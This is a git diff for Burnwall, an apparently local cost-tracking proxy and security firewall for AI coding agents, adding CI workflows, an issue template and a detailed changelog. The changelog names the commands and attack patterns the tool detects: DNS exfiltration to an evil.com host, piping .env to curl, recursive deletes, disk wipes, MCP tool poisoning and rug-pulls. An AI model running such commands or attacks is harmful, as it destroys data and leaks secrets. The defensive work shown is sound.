diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md new file mode 100644 index 0000000..8c2658b --- /dev/null +++ b/.github/ISSUE_TEMPLATE/bug_report.md @@ -0,0 +1,51 @@ +--- +name: Bug report +about: Something isn't working as expected +title: "" +labels: bug +assignees: "" +--- + + + +## What happened + +A clear description of the problem. + +## What you expected + +What you expected to happen instead. + +## Steps to reproduce + +1. +2. +3. + +## Diagnostic bundle + +Paste the output of `burnwall doctor --export` (it's redacted + self-scanned): + +``` +(paste here) +``` + +## Environment + +- Burnwall version: +- OS / arch: +- AI tool(s) involved: + +## Anything else + +Logs, screenshots, or context. Please don't paste API keys or prompt content — +the `doctor --export` bundle already excludes them. diff --git a/.github/actions/burnwall-scan/action.yml b/.github/actions/burnwall-scan/action.yml new file mode 100644 index 0000000..b7a08ee --- /dev/null +++ b/.github/actions/burnwall-scan/action.yml @@ -0,0 +1,63 @@ +name: 'Burnwall Scan' +description: >- + Scan agent config files (CLAUDE.md, .cursorrules, .mcp.json, .claude/ and + friends) for committed credentials and hidden-instruction smuggling, and + upload the findings as SARIF to the repository Security tab. +author: 'Burnwall' +branding: + icon: 'shield' + color: 'orange' + +inputs: + paths: + description: 'Space-separated files or directories to scan.' + required: false + default: '.' + all-files: + description: 'Scan every text file in directories, not just known agent configs.' + required: false + default: 'false' + fail-on-findings: + description: 'Fail the job when anything is found (in addition to the SARIF upload).' + required: false + default: 'false' + upload-sarif: + description: >- + Upload the SARIF report to GitHub code scanning. Requires the + `security-events: write` permission on the job. Set to false to only + print findings (and optionally gate via fail-on-findings). + required: false + default: 'true' + burnwall-version: + description: 'Burnwall release to install (for example "0.9.15"). Defaults to the latest release.' + required: false + default: 'latest' + +runs: + using: 'composite' + steps: + - name: Install Burnwall + shell: bash + run: | + if [ "${{ inputs.burnwall-version }}" != "latest" ]; then + export BURNWALL_VERSION="${{ inputs.burnwall-version }}" + fi + curl -fsSL https://raw.githubusercontent.com/intbot/burnwall/main/install.sh | sh + echo "$HOME/.local/bin" >> "$GITHUB_PATH" + + - name: Scan agent configs + shell: bash + run: | + ARGS="" + if [ "${{ inputs.all-files }}" = "true" ]; then ARGS="$ARGS --all-files"; fi + if [ "${{ inputs.fail-on-findings }}" = "true" ]; then ARGS="$ARGS --fail-on-findings"; fi + # fail-on-findings exits non-zero AFTER writing the SARIF report, so + # the upload step still runs (`if: always()` below) and the Security + # tab gets the findings either way. + burnwall scan ${{ inputs.paths }} --sarif burnwall-scan.sarif $ARGS + + - name: Upload SARIF to code scanning + if: ${{ always() && inputs.upload-sarif == 'true' }} + uses: github/codeql-action/upload-sarif@v3 + with: + sarif_file: burnwall-scan.sarif diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index b938a67..82ad3c2 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -112,6 +112,10 @@ jobs: env: GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} BUILD_MANIFEST_NAME: target/distrib/${{ join(matrix.targets, '-') }}-dist-manifest.json + permissions: + "attestations": "write" + "contents": "read" + "id-token": "write" steps: - name: enable windows longpaths run: | @@ -144,6 +148,30 @@ jobs: # Actually do builds and make zips and whatnot dist build ${{ needs.plan.outputs.tag-flag }} --print=linkage --output-format=json ${{ matrix.dist_args }} > dist-manifest.json echo "dist ran successfully" + # NOTE: manual patch over the cargo-dist-generated workflow — re-apply + # after `dist generate`. Retries build-provenance attestation up to 3x + # because Sigstore's transparency log intermittently returns a transient + # "InternalError: error fetching tlog entry". Attestation stays MANDATORY: + # the final attempt is not continue-on-error, so a persistent Sigstore + # outage still fails the job (we never ship an un-attested release). + - name: Attest + id: attest1 + continue-on-error: true + uses: actions/attest@v4 + with: + subject-path: "target/distrib/*${{ join(matrix.targets, ', ') }}*" + - name: Attest (retry 1) + id: attest2 + if: steps.attest1.outcome == 'failure' + continue-on-error: true + uses: actions/attest@v4 + with: + subject-path: "target/distrib/*${{ join(matrix.targets, ', ') }}*" + - name: Attest (retry 2) + if: steps.attest1.outcome == 'failure' && steps.attest2.outcome == 'failure' + uses: actions/attest@v4 + with: + subject-path: "target/distrib/*${{ join(matrix.targets, ', ') }}*" - id: cargo-dist name: Post-build # We force bash here just because github makes it really hard to get values up diff --git a/.github/workflows/scorecard.yml b/.github/workflows/scorecard.yml new file mode 100644 index 0000000..080aa39 --- /dev/null +++ b/.github/workflows/scorecard.yml @@ -0,0 +1,45 @@ +# OpenSSF Scorecard — supply-chain health signal for a zero-telemetry tool. +# A local tool can't use product analytics for trust; a published Scorecard + +# the dist-built reproducible release artifacts stand in for it. +name: Scorecard + +on: + branch_protection_rule: + schedule: + - cron: "37 4 * * 1" # weekly, Monday + push: + branches: ["main"] + +permissions: read-all + +jobs: + analysis: + name: Scorecard analysis + runs-on: ubuntu-latest + permissions: + security-events: write # upload SARIF to the Security tab + id-token: write # publish results to the public Scorecard API + steps: + - name: Checkout + uses: actions/checkout@v5 + with: + persist-credentials: false + + - name: Run analysis + uses: ossf/scorecard-action@v2.4.0 + with: + results_file: results.sarif + results_format: sarif + publish_results: true + + - name: Upload artifact + uses: actions/upload-artifact@v5 + with: + name: scorecard-results + path: results.sarif + retention-days: 5 + + - name: Upload to code-scanning + uses: github/codeql-action/upload-sarif@v3 + with: + sarif_file: results.sarif diff --git a/CHANGELOG.md b/CHANGELOG.md index b60c34b..bf0645f 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -2,6 +2,629 @@ All notable changes to Burnwall. +## [0.11.0] — 2026-06-17 + +A dashboard-polish release: clearer, more glanceable surfaces, plus two new +cost views and a security hardening — all built on data Burnwall already +captures on the wire. Still zero telemetry, still a single local binary. + +### Added + +**Cost** +- **`burnwall accuracy`** — contrast your real on-the-wire, cache-aware cost with + a naive token tally (every prompt token charged at the base input rate, the + shortcut a log-only estimator takes when it ignores cache reads). For + cache-heavy coding sessions the naive tally can overstate the bill by a wide + margin; this shows by how much, per model. +- **`burnwall tags`** — attribute spend by your own labels. Set the opt-in + `x-burnwall-tags` header (e.g. `feature=auth,agent-run=run42,client=acme`) and + Burnwall rolls spend up by key → value, locally, with cost and request counts. + +**Surfaces** +- **Delta-vs-previous chips** on the stat cards: `burnwall status` compares to + yesterday, `burnwall history` to the prior window, coloured by whether the move + is good or bad (spend up = caution, cache up = good). +- **Share-of-spend bars** in the cost-by-model tables, so the dominant model is + obvious at a glance. +- **Daily-spend sparkline** in `burnwall history`, and a 7-day spend trend on + `burnwall status`. +- **VS Code panel:** a spend-trend chart, delta chips, and share bars — rendered + with a baked, script-free SVG so it works under the panel's locked-down webview + and adapts to your editor theme. + +**Security** +- **MCP tool fingerprints now use SHA-256** (collision-resistant). The upgrade is + migrated in place: an already-approved tool is re-pinned to the new format + silently and is **not** re-prompted by the format change alone — only a genuine + change to the tool still resets approval. + +## [0.10.0] — 2026-06-12 + +A large release: a wave of security, cost, and compliance features, plus an +availability-hardening pass driven by dogfooding — so the proxy stays safe to run +hands-off even when something outside Burnwall (an antivirus, a crash) takes it down. + +### Added + +**Security** +- **Scan agent config files for committed secrets + hidden instructions.** `burnwall + scan ` checks `CLAUDE.md` / `.cursorrules` / `.mcp.json` / `.claude/` and + friends for committed credentials and invisible-Unicode instruction smuggling, with + SARIF output. A one-line **GitHub Action** runs it in CI and posts findings to the + repository's Security tab. +- **Teach your agent about Burnwall.** `burnwall skills install` drops a guide where + Claude Code and Codex discover it, so the agent can read your spend, explain a block, + and run the file scanner — but never weaken protection itself. +- **Decode-then-scan + invisible-text scrubbing.** Obfuscated (base64/hex) and + zero-width-Unicode payloads inside tool calls are un-hidden before checking. +- **Canary trap.** Plant a fake credential; if it ever tries to leave the machine, the + request is blocked and a tamper-proof receipt is sealed. +- **Egress checks for file uploads and credential misdirection** (opt-in), a + **silent-billing watchdog** (warns when a session flips from subscription to metered), + and a **slow-drip exfiltration monitor** (warn-only). +- **Per-project MCP allowlist** — restrict which MCP servers an agent may reach, per repo. +- **Paranoid mode** (opt-in) — fail closed: block a request the scanner cannot inspect, + for users who prefer that over the fail-open default. +- **Image/link exfil warning** (opt-in, warn-only) — flags a model reply that embeds a + data-carrying image URL, the zero-click exfiltration pattern. + +**Cost** +- **Per-repo / per-client cost export** to CSV, correct even when several projects run + at once. +- **`burnwall wire-check`** — compare your real on-the-wire spend with a log-scrape + estimate. +- **Cache-dead-zone warning**, an **hourly spend brake** (opt-in), and an optional + **cheaper-model fallback** when you hit a budget cap instead of stopping work. +- **Tool-output trim** (opt-in) — middle-truncate oversized tool results before they + re-enter context, with an in-band marker, to cut token cost. + +**Compliance** +- **SPDX 3.0 AI-profile bill-of-materials** and framework-labelled evidence packs on top + of the existing CycloneDX AIBOM + SARIF exporters; a control crosswalk rides on blocks. + +**Integration** +- **Sit in front of a gateway you already use.** A new `[upstreams]` config (and + `--upstream-*` flags) chains Burnwall ahead of any OpenAI- or Anthropic-compatible + gateway, keeping cross-tool spend tracking and enforcement on top. + +**Resilience** +- **`burnwall recover`** — get unstuck if the proxy dies under you: pauses routing so new + shells go direct, and explains how to restore already-open tools. +- **`burnwall guard`** — a watchdog that auto-pauses routing if the proxy dies while + routed, so a crash or quarantine can't strand new shells. + +**Diagnostics & data** +- **`burnwall doctor`** — a one-glance health check that names what's wrong and the exact + fix, with `burnwall doctor --export` writing a redacted, metadata-only bundle that + self-scans for secrets before it's written (and refuses to write if anything + secret-shaped survives) — the thing to attach to a bug report. +- **`burnwall explain `** — explain any block in plain language: what rule fired, a + masked preview of what matched, why that class is blocked, and how to proceed. +- **`burnwall export --format csv|json`** — a portable copy of your metadata, on your + machine, any time. +- **Rule reference + troubleshooting docs.** Every block carries a stable rule id that + resolves to a `docs/RULES.md` entry (mirrored by `burnwall explain`), plus a + symptom→fix `docs/TROUBLESHOOTING.md` and a diagnostic-first bug-report template. + +### Changed +- **Graceful drain on stop.** `burnwall stop` (and `upgrade`) now let in-flight requests + finish before exiting instead of cutting them mid-stream. +- **A crash, forced kill, or antivirus quarantine is now diagnosed.** `burnwall start` + notices an unclean prior exit and, on a streak, points at the likely cause (an + antivirus quarantining the unsigned binary) with the fix. Panics in background tasks + are now written to the log instead of vanishing silently. +- **Status-line block count** reads `🚫 N blocked` and no longer renders the digit on top + of the shield glyph in some terminals. +- **Status-line context reads true.** The context gauge no longer snaps toward ~100% off + a stale plan window — it shows the tool's own headroom figure (the one `/usage` reports) + and marks it stale rather than implying the conversation is nearly full. +- **Blocks and alerts are reported separately.** A warn-only security alert is no longer + counted as a block: `burnwall status` shows the two side by side, and the nudge line + reads "blocked N request(s)" versus "raised N security alert(s)" honestly. +- **Windows install note.** The README and the installer now explain the + Defender/SmartScreen false positive and how to recover from it. + +### Fixed +- **Fewer false security blocks**, each locked with a regression test: a + credential-shaped string in resent conversation history (including a `/compact` + summary), an editor tool writing a key into a local test fixture, a search query that + mentions a sensitive path, and a tool's non-command metadata field no longer 403 — + while a genuine credential or dangerous command inside an actual tool call still blocks. +- **MCP watcher description-drift state is now per-watcher.** The advisory "a tool changed + its description" memory was process-global, so two watchers — or an ephemeral upstream + port reused by a different server — could leak sightings into each other (a flaky test + surfaced it). It's now scoped to each watcher instance; enforcement was never affected. + +## [0.9.15] — 2026-06-10 + +A follow-up from live dogfooding: kill a false-positive class that could wedge a +whole session, make every block explain itself, give false positives a live +escape hatch, and stop surfaces from showing stale numbers when the proxy is +down. + +### Added +- **`burnwall pause` / `resume` / `allow-once` — a live escape hatch.** After a + block you believe is a false positive, `burnwall allow-once` lets exactly the + next request through (then protection restores itself), and `burnwall pause + [5m]` relays everything unchecked for a bounded window — both take effect on + the running proxy with no daemon or AI-tool restart, so the agent's session + survives. Pauses auto-expire (default 5 minutes, capped at 24 hours), an + unused allow-once expires after 10 minutes, and every status surface shows a + loud `⏸ PAUSED` warning with a countdown for the whole window. Block messages + now point at these toggles; the previous advice (an environment variable plus + a tool restart) never reached a backgrounded daemon and has been removed. + +### Fixed +- **A secret-shaped token in conversation history no longer blocks the session.** + Security data checks (credentials, cards, SSNs) now run only inside tool-call + arguments — the agent *action* — never on prose or resent conversation history. + Clients resend the full conversation every turn, so a key-shaped string merely + *quoted or discussed* (e.g. an example key in a summary) used to 403 every + request until the session was abandoned. The exfiltration vector that matters — + a credential leaving the machine inside a tool call — stays fully covered. +- **Subscribers no longer see a notional dollar figure where a plan reading + belongs.** When the latest plan reading is stale (idle, or the proxy was briefly + down), the status line keeps showing last-known plan headroom — marked stale — + instead of falling back to a session-cost figure that reads as real money. The + `status` command frames a subscriber's spend as notional, not a budget breach. + +### Changed +- **Blocks now explain themselves.** A security block names the tool that tripped + it, shows a masked, recognisable preview of what matched (e.g. `AKIA…LKEY`) for + credential/PII hits — the raw value is never echoed or logged — and states why + that class is blocked, instead of a bare category label. +- **A down proxy now looks down.** When routing points at a dead proxy, status + surfaces drop the cost, plan, today, and block-count segments (all stale with no + capture happening) and show only the loud "proxy down" warning alongside the + tool-reported token and context gauges. + +## [0.9.14] — 2026-06-10 + +A real-world robustness pass driven by dogfooding: a multi-agent review of +every feature, focused on the failure modes that make a tool freeze, falsely +block, or mislead — the kind that trigger an uninstall. + +### Fixed + +- **The daily budget now resets at midnight.** A long-running proxy used to + accumulate spend across days and eventually return "budget exceeded" on every + request even though the day's real spend was small. The counter is now + day- and month-aware (restart- and clock-change-proof), and the monthly cap + is actually enforced. +- **Loop detection no longer gets stuck on retries.** A blocked request (and a + client's automatic retry of it, or a retry after a provider outage) no longer + feeds the loop-detection window, so a transient blip can't wedge a session + into a permanent 429 loop. Blocks now carry a `Retry-After`, and the window is + keyed per method/provider/path so unrelated requests don't collide. +- **Fewer false security blocks.** Writing or discussing a file that merely + mentions a sensitive path (e.g. `~/.ssh` in a README) no longer 403s — only + shell-tool arguments get command checks. Windows paths in tool arguments are + no longer mistaken for network mounts, scoped deletes like `rm -rf /tmp/x` + pass, and well-known documentation/example keys are exempt. Blocks now explain + what was caught and how to proceed, and `burnwall report-bug` writes a + sanitized local report for false positives. +- **The proxy no longer hangs on a stalled or unreachable upstream**, and + cancelling a request (Esc) stops the upstream instead of billing the full + response. +- **Accurate cost capture for more tools.** OpenAI's Responses API (used by + Codex) is now parsed instead of silently recording $0, unknown models warn + instead of recording $0, and the cross-tool "today" total no longer + double-counts traffic that went through the proxy. + +### Changed + +- **A crashed or stopped proxy no longer breaks your terminals.** Shell routing + is liveness-gated: if the proxy isn't running, a new shell talks directly to + the provider (unprotected but working) instead of failing to connect. Every + status surface shows a clear "proxy down" warning when routing points at a + dead port. PowerShell now gets persistent routing like the other shells. +- Plan-aware budgeting: on a flat-rate subscription, the dollar cap is treated + as advisory (tracked and warned, not blocked) unless you opt in. +- Hardening across MCP (prose-safe scanning, clearer approval errors), the audit + chain (lost-key detection), storage (schema versioning), and the daemon + (a real log file, PID identity checks). + +## [0.9.13] — 2026-06-09 + +### Fixed + +- **Talking *about* a denied path or command no longer blocks the request.** + The proxy's security scan previously applied every rule to every string in + the request body, so a system prompt, chat message, tool definition, or tool + result that merely *mentioned* `~/.ssh` or `rm -rf` returned a 403 — e.g. a + project's CLAUDE.md documenting a deny list made every Claude Code request + from that repo fail (surfacing in the client as a bogus "run /login" auth + error). Command-shaped rules (denied paths/commands, network mounts, + destructive commands, exfil techniques) now apply only inside tool-call + argument subtrees (Anthropic `tool_use.input`, OpenAI + `tool_calls`/`function_call` arguments, Gemini `functionCall`) — the places + an agent actually acts. Secret detection and DLP still scan the entire + payload, and MCP `tools/call` bodies keep the strict whole-body scan. +- **A blocked tool call no longer poisons the conversation forever.** Clients + resend the full history on every request, so one (correctly) blocked call + used to re-trigger the 403 on every subsequent message — the only escapes + were a new conversation or the bypass switch. Command-shaped rules now apply + to the **latest assistant turn's in-flight tool round** only: the request + carrying the dangerous call (and its results) is still blocked, but once the + user sends a new message that round is adjudicated history and the + conversation continues. Secrets/DLP still scan all turns, so sensitive + content in old results stays caught. +- **`burnwall stop` no longer strands routed shells on a dead proxy.** Stopping + the proxy used to leave `ANTHROPIC_BASE_URL`/`OPENAI_BASE_URL` pointing at + the closed port, so every AI tool failed with a connection error until the + user discovered `disable-routing`. `stop` now pauses routing (new shells go + direct), prints how to clear the variables from already-open terminals, and + `start` resumes routing automatically. An explicit `burnwall + disable-routing` is remembered and never overridden by `start`; opt out of + the coupling with `stop --keep-routing` / `start --no-routing`. + +### Added + +- **`uninstall` now removes routing env files instead of stubbing them, and + warns about already-open terminals.** The leftover banner-only stub was + residue on a machine the user asked to clean, and it kept counting the + shell as "configured" forever (fish/PowerShell are detected by env-file + presence). Uninstall also can't pull env vars out of running shells — no + uninstaller can — so it now says so and prints the per-shell unset command. + +- **Pricing for Claude Fable 5 and Opus 4.8** (both released 2026-06-09): + `claude-fable-5` at $10/$50 per MTok (cache write $12.50, read $1.00) and + `claude-opus-4-8` at the standard Opus $5/$25. Pricing lookup now also + resolves bracket variant tags — Claude Code requests the 1M-context tier as + `claude-fable-5[1m]`, which previously fell through to "unknown model". + +## [0.9.12] — 2026-06-09 + +### Fixed + +- **Routing commands now act on every configured shell, not just the detected + one.** A user often drives more than one shell (on Windows, PowerShell *and* + Git-bash are the norm). Previously `enable-routing` / `disable-routing` / + `uninstall` resolved a single shell and touched only its env file + rc hook, so + enabling from PowerShell left bash silently unrouted (and `uninstall` could + leave a live rc hook pointing at a removed proxy). They now sync the detected + shell **plus** every shell already configured for routing, keeping them + consistent. Bash/zsh are disambiguated by their rc-hook (they share one + `env.sh`); fish/PowerShell by their own env files — so a never-used shell is + never pulled in (no spurious `~/.zshrc`). + +### Added + +- **Not-routed warning on the Claude Code status line.** When a tool's traffic + isn't flowing through the proxy, the ribbon shows a loud `⚠ DIRECT + (unprotected)` chip (and `⚠ bypass` when `BURNWALL_BYPASS` is set) right after + the model — so "the proxy is running but my traffic isn't reaching it" can't go + unnoticed. Detected from the tool's `*_BASE_URL` in the environment the status + line inherits; silent on the healthy path. +- **Routing readout in `burnwall status`.** A per-shell line states whether this + shell points traffic at the proxy, with the one-line fix when it doesn't; also + surfaced as `env_routing` in `status --json` for the editor extension. +- **Colorized console output.** The install scripts (`install.sh` / `install.ps1`), + the proxy banner, the background-start and login-service messages, and the + routing/coverage readouts now use semantic color (green = active/healthy, + yellow = caution, red = unprotected). Honors `NO_COLOR` and non-TTY output, so + piped/redirected text stays clean. + +## [0.9.11] — 2026-06-08 + +### Added + +- **Subscription-aware status, across every surface.** For a Claude Pro/Max plan, + dollar figures are notional (you pay a flat rate), so Burnwall now shows what's + actually scarce: your usage-window headroom. The proxy reads Anthropic's + `anthropic-ratelimit-unified-*` response headers (rolling 5-hour + 7-day windows) + off traffic it already forwards and persists a small, non-sensitive, **per-provider** + snapshot; surfaces render e.g. `5h [▓░░░░░░░] 17% (1h56m) · 7d 10%` in place of the + dollar segment, leading with whichever window the provider reports as binding and + flagging a throttled status. Auto-detected (a subscription emits these headers, an + API key doesn't — verified against Anthropic's docs), so API users keep the + dollar/cost view with no configuration; falls back to dollars when no fresh snapshot + exists. Surfaced on: + - the **Claude Code status line** (`burnwall statusline`); + - **`burnwall watch`** — the cross-tool pane for CLIs without their own status bar + (Codex, Aider, …): run it in a split pane to see the gauge; + - **`burnwall watch --title`** — emits the ribbon as a terminal-title (OSC) escape, + for a shell prompt hook or `tmux status-right`, so even a status-bar-less CLI gets + it in the window title; + - **`status --json`** — a `plan` block (per-provider windows + reset countdown), + rendered by the **VS Code / Cursor / Windsurf extension** status bar + tooltip. + + The capture is provider-generic; OpenAI/Google hooks exist but return nothing until + their subscription signal is probed and verified (we don't synthesize a window from + per-minute API limits). + +- **Coverage readout — which of your tools are actually behind the firewall.** A + proxy only protects traffic that flows through it, and the dangerous failure mode + is *silent* non-coverage — a tool you assume is protected whose traffic never + reaches Burnwall. Burnwall now makes coverage visible per installed tool: + - **`burnwall init`** warns at setup when a detected tool is in a bypassing mode — + concretely, Codex signed in with ChatGPT login (read from `~/.codex/auth.json`, + a local non-secret mode flag), whose traffic goes to the ChatGPT backend over + OAuth and can't be routed through any no-MITM proxy. It notes that API-key + mode would route through Burnwall but bills per-token — an informed trade-off, + not a blanket "switch." + - **`burnwall status`** and **`burnwall watch`** show a per-tool **Coverage** + section: *protected* (provider seen routing recently), *installed but no traffic + seen*, or *bypasses*. `status --json` carries a `coverage` array, and the VS Code + / Cursor / Windsurf extension surfaces a `⚠ unprotected` warning plus a + tooltip breakdown. + - README documents the boundary outright. + +- **More official security rule packs.** The bundled, signed-release rule packs + grew from 4 to **8** — added `node`, `python`, `go`, and `kubernetes`, and + fleshed out `django` / `react` / `infrastructure` / `data-science` (now ~61 + rules total). Each targets unambiguously sensitive credential/state files + (`.npmrc`, `.pypirc`, kubeconfigs, `terraform.tfstate`, …) and genuinely + destructive commands, keeping the low-false-positive bar. Install with + `burnwall rules install `; list with `burnwall rules list`. +- **`burnwall rules lint`** — validate a rule pack against strict acceptance rules + (stricter than the runtime: forbidden/unknown keys, uncompilable or over-broad + rules are hard errors), optionally verifying its signature (`--sig`). Exits + non-zero on any error and supports `--json`, so it can gate a community rule + repo's CI. The bundled official packs are themselves checked by it in CI. + +### Changed + +- Status ribbon now carries a `burnwall` wordmark — `🔥 burnwall · · …` — + across every surface (Claude Code status line, `burnwall watch`, editor status + bar), which share one renderer. +- `short_model` now keeps a trailing context-variant tag and upper-cases it, and + no longer lets it defeat the version dotting: `claude-opus-4-8[1m]` renders as + `opus-4.8[1M]` (was `opus-4-8[1m]`). + +## [0.9.10] — 2026-06-08 + +### Added + +- **`burnwall init` now wires up the Claude Code status line.** When Claude Code + is detected, `init --apply` merges a `statusLine` block into + `~/.claude/settings.json` so the Burnwall ribbon (model · ↑/↓ tokens · spend) + appears automatically — no hand-editing JSON. The merge is idempotent, + preserves your other settings, writes the PATH-resolved `burnwall statusline` + command, and never overwrites a status line you already configured. +- **`burnwall uninstall`** — one command to undo everything `install` + `init` + set up: stops the proxy, removes the login service, removes the Claude Code + status line (a foreign one is left untouched), empties the routing env file and + removes the rc-source hook, and removes the binary. Your cost-history database + is kept by default; `--purge` deletes the whole `~/.burnwall` data directory. + Confirms before acting (skip with `--yes`); refuses to run non-interactively + without `--yes`. + +### Changed + +- `burnwall upgrade` now sweeps the leftover `burnwall.exe.old` from a previous + Windows self-upgrade on the next launch, so the transient renamed binary never + lingers (best-effort, silent; the running binary can't delete itself). + +## [0.9.9] — 2026-06-08 + +### Added + +- **`burnwall upgrade`** (alias `self-upgrade`) — one command to move to the + latest release. It stops the running proxy first (a live `burnwall.exe` can't + be overwritten on Windows), runs the installer, and restarts the proxy. On + Windows it renames its own running binary aside so the installer can write the + new one, restoring it if the install fails. `--dry-run` to preview, + `--no-restart` to skip the restart. The mirror of `self-rollback`. + +## [0.9.8] — 2026-06-07 + +### Added + +- **`burnwall savings`** — your own *measured* cache-savings report: dollars + recovered through caching over a window (from real token buckets at published + cache-read vs base-input rates), plus models that are underusing caching. No + marketing percentages — your numbers. +- **`burnwall watch` / `status` self-test heartbeat** — `status` now states + plainly whether protection is live ("proxy running (pid …); every request is + scanned"), so a passive proxy never leaves you wondering if it's working. +- **`burnwall share`** — an opt-in, screenshot-friendly, **signed** value card + (spend / cache savings / blocks), verifiable against the local audit key so the + numbers can't be faked. Nothing leaves your machine. +- **`burnwall sidecar`** — run the proxy as a co-located egress point for an + agent that executes off your laptop (self-hosted sandbox / container / CI + runner), with the in-sandbox env-var recipe. Same scanning + budgets; not a + TLS-terminating proxy (no CA injection — see `SECURITY.md`). +- **Catastrophic-command detection by shape** — recursive-force deletes, disk + destruction (`dd of=/dev/…`, `mkfs`), and destructive SQL (`DROP`/`TRUNCATE`) + are blocked regardless of flag order, spacing, or target expansion — the forms + that slipped past literal/approval checks in real incidents. +- **Data-exfiltration technique detection** (opt-in under `security.dlp`): DNS + exfiltration, secret-file-piped-to-network, command-substituted uploads. +- **Per-session / swarm budget ceiling** (`budget.per_session`, opt-in via an + `x-burnwall-session` request header) — agents in a fan-out that share a session + id share one blast-radius cap; `status` shows a per-session breakdown. +- **Build provenance** — releases now carry GitHub Artifact Attestations (SLSA + Build L2); verify with `gh attestation verify … --repo intbot/burnwall`. New + `SECURITY.md` documents integrity + TLS handling (rustls, no CA injection, no + plaintext at rest), backed by a guard test. + +### Changed + +- `command_matches` is whitespace-normalized, so padding (`rm -rf /`) can't + evade a literal deny rule. +- README: "Verify your download" + the trust/defense-in-depth sections. + +## [0.9.7] — 2026-06-07 + +### Added + +- **Data-exfiltration technique detection** (opt-in, under `security.dlp`) — the + scanner now flags the exfiltration *method* in a tool-call argument, not just + secrets in the payload: DNS exfiltration (`dig $(...).evil.com`, encoded + subdomains), a secret file piped to the network (`cat .env | curl -d @-`), and + command-substituted uploads. Conservative/high-signal (a network tool alone is + fine) and names only the technique, never the data. +- **`burnwall security --summary`** — a "what Burnwall caught for you" receipt: + blocks grouped by type over the window (pairs with `--days 7`), so passive + protection registers as ongoing value instead of going unseen. +- **`burnwall audit pack`** — one-command compliance evidence pack: bundles the + signed hash-chained receipts, the CycloneDX 1.6 AIBOM, and the SARIF 2.1.0 + security findings into a directory with a `MANIFEST.md` that maps each artifact + to the controls auditors ask for (ISO/IEC 42001, EU AI Act Art. 12/26, FINRA). + The artifacts already existed; this is one command + the framework mapping you + can hand a security team. +- **MCP firewall is validated against the published attacks** — a test corpus + models the real PoCs (Invariant tool-poisoning / SSH-key exfiltration, the + MCPoison rug-pull that swaps a tool's behavior after approval, `` + shadowing) so coverage is provable and stays covered. + +### Changed + +- README: a **Trust & privacy** section (local, zero-telemetry, read-only on + responses, signed single-binary releases, auditable "no network except + forwarding"), a **defense-in-depth** framing for security (rules run before + anything leaves your machine; complements — doesn't replace — native + controls), and the MCP scope note now points at the built-in `mcp-watch` + firewall (tool-poisoning + rug-pull detection). + +## [0.9.6] — 2026-06-07 + +### Added + +- **`burnwall watch`** — a live, cross-tool status ribbon for a spare terminal + pane. The in-TUI ribbon only works in Claude Code; this shows the *same* + renderer for every tool that routes through the proxy (Codex, Gemini, Aider, + …), sourced from the local database. `--oneline` for a compact line, `--once` + for a single frame (scripting/tests), `--interval` for the fallback refresh. + It refreshes event-driven off the `watch.signal` marker the proxy touches each + turn, with a periodic fallback. The headline figure is **today's spend across + all tools** — the cross-tool number no single tool shows. +- The status ribbon's context gauge stays honest on this surface: no tool feeds + an exact context %, so it's an estimate (`~`) when the model's window is known + and the prompt fits, and `—` otherwise — never an unqualified number. + +### Changed + +- Ribbon cost fields (`sess`, `today`) are now rendered only when known, so the + cross-tool view (which has no per-session concept) shows per-message + today + without a misleading "session" figure. + +## [0.9.5] — 2026-06-07 + +### Added + +- **`burnwall statusline`** — renders the Burnwall ribbon for Claude Code's + customizable status line. Reads Claude Code's per-turn JSON on stdin and prints + one line: `🔥 sonnet-4.6 · ↑13k ↓615 · $0.05 msg $0.16 sess · $2.40 today · ctx + [▓▓░░░░░░] 22%`. Per-message cost is derived from the cumulative session total; + today's spend and security-block count are enriched from the proxy database, so + the line reflects spend **across all your tools**, not just the current one. + Wire it up with one line in `~/.claude/settings.json`: + `{ "statusLine": { "type": "command", "command": "burnwall statusline" } }`. + Fail-open: malformed input or an unreadable database still yields a best-effort + line rather than breaking the editor. +- **Context gauge is honest by construction** — the ribbon shows a context-window + percentage only when it's *exact* (reported by the tool, e.g. Claude Code). + Where a value is estimated it's flagged with `~`; where the window can't be + trusted it renders `—`; where the tool already shows its own gauge it's omitted + rather than duplicated. +- **Activity marker** — the proxy touches `/watch.signal` after each + recorded turn (off the response path, so no added latency), laying the + groundwork for event-driven refresh of upcoming status surfaces. + +### Fixed + +- **`burnwall install-service` on Windows no longer needs admin.** It previously + created a Scheduled Task at the Task Scheduler library root, which requires + elevation and failed with "Access is denied" for a normal shell. The default is + now a per-user `HKCU\…\Run` registry entry that launches `burnwall start + --daemon` at logon — no UAC. `--task` opts back into the Scheduled-Task variant + (which adds crash-restart) for users who run an elevated terminal. + `uninstall-service` removes whichever was installed. + +## [0.9.4] — 2026-06-07 + +### Added + +- **Five-layer graceful-degradation model**, so a bad release can't break your AI + tools: + - `BURNWALL_BYPASS=1` — instant kill-switch. Proxy becomes a pure relay; no + security scan, no budget check, no storage write. Forward bytes to the + upstream and stream the response back unchanged. + - **Panic-catching wrapper** — if anything in the request pipeline panics, the + proxy returns a clear 502 (pointing the user at `BURNWALL_BYPASS=1`) instead + of dropping the connection. + - **Crash-loop circuit breakers** baked into each platform's service unit + (launchd `ThrottleInterval=60`, systemd `StartLimitBurst=5`, Task Scheduler + `RestartOnFailure` capped at 5 attempts). + - **`burnwall self-rollback `** — fetches the version-pinned dist + installer for any prior release and reinstalls. Windows refuses to roll back + while the proxy is running so it can replace the binary safely. + - **Sourced env-file activation model** — one burnwall-owned file + (`~/.config/burnwall/env.sh` / `%APPDATA%\burnwall\env.ps1`) holds the + routing exports; the user's rc gets one idempotent source line. Disable by + truncating the env file — one place to revert. +- **`burnwall enable-routing` / `disable-routing`** — write/clear the env file, + install the rc-hook, and emit eval-able exports for immediate-effect + activation in the current shell (`eval "$(burnwall enable-routing)"` on POSIX, + `burnwall enable-routing --eval | Out-String | Invoke-Expression` on + PowerShell). `enable-routing` runs a `/healthz` preflight against the proxy + before activating. +- **`burnwall install-service` / `uninstall-service`** — registers burnwall as a + login-time service so the proxy auto-starts. User-scoped (no admin needed) on + all three platforms: launchd LaunchAgent on macOS, systemd user unit on Linux, + Windows Scheduled Task at logon. +- **`/healthz`** local probe — returns 200 without touching upstreams. Used by + the activation preflight, the supervisor circuit breaker, and any external + monitor. +- **Extended `burnwall init`** — two-step interactive flow that now also offers + login-service install and routing activation in the same run. `--apply` to + execute, `--yes` for 